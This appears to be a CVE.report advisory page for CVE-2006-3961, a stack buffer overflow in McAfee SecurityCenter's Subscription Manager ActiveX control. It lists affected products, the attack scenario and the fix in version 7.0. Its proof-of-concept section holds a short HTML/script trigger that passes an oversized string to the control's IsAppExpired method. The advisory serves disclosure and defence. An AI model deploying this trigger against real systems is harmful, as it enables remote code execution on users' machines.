McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

BID:19265

CVE-2006-3961 |

Info

McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

Bugtraq ID: 19265
Class: Boundary Condition Error
CVE: CVE-2006-3961
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Jul 03 2007 07:18PM
Credit: Discovered by eEye Digital Security.
Vulnerable: McAfee Wireless Home Network Security 2006
McAfee VirusScan 2006
McAfee VirusScan 2005
McAfee VirusScan 2004
McAfee SpamKiller 2006
McAfee SpamKiller 2005
McAfee SpamKiller 2004
McAfee SecurityCenter 6.0.22
McAfee SecurityCenter 6.0
McAfee SecurityCenter 4.3
McAfee QuickClean 2006
McAfee QuickClean 2005
McAfee QuickClean 2004
McAfee Privacy Service 2006
McAfee Privacy Service 2005
McAfee Privacy Service 2004
McAfee Personal Firewall Plus 2006
McAfee Personal Firewall Plus 2005
McAfee Personal Firewall Plus 2004
McAfee Internet Security Suite 2006 0
McAfee Internet Security Suite 2005
McAfee Internet Security Suite 2004
McAfee AntiSpyware 2006
McAfee AntiSpyware 2005
Not Vulnerable: McAfee SecurityCenter 7.0

Discussion

McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

McAfee SecurityCenter is prone to a stack-based buffer-overflow vulnerability. This vulnerability requires a certain amount of user-interaction for an attack to occur, such as visiting a malicious website. A successful exploit would let a remote attacker execute code with the privileges of the currently logged in user.

This issue is reported to affect versions 4.3 through 6.0.22. Please see the affected packages section for a list of McAfee consumer products that ship with vulnerable versions of the McAfee SecurityCenter.

Exploit / POC

McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

The following proof-of-concept and Metasploit exploit module are available:

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Red'
></object>
GK=String(165001, "a")
Red.IsAppExpired GK

Solution / Fix

McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

Solution:
This issue has been addressed in SecurityCenter 7.0. Please see the vendor advisory for information on obtaining fixes.

References

McAfee SecurityCenter Subscription Manager ActiveX Buffer Overflow Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report